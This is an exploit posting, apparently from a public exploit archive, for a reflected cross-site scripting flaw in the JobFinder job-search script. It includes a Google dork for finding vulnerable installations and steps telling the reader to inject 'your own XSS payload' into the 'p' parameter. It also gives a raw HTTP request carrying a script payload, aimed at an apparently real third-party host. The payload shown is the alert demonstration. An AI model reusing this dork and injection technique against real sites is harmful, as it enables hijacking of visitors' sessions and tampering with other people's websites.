JobFinder Cross Site Scripting

JobFinder suffers from a cross site scripting vulnerability.


MD5 | d7af768a26e6fc8bfc4c7a525735dd08

# Exploit Title: JobFinder - 'jobs p' Cross-site Scripting
# Google Dork: inurl:"jobs?j=Accounting"
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://www.armorthemes.com/
# Software Link: https://codecanyon.net/item/jobfinder-job-search-engine-affiliate-script/21788181
# Demo Website: http://www.armorthemes.com/demo/jobfinder/
# Version: N/A
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
----------------------
JobFinder suffers from a cross site scripting vulnerability.

# POC:
----------------------
1. Access the following path http://[PATH]/jobs?p=1
2. Manipulate the parameter "p" with your own XSS payload.

# Request:
----------------------
GET /jobs?p=<script>alert('XSS')</script> HTTP/1.1
Host: elsejob.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 21
Connection: close



Related Posts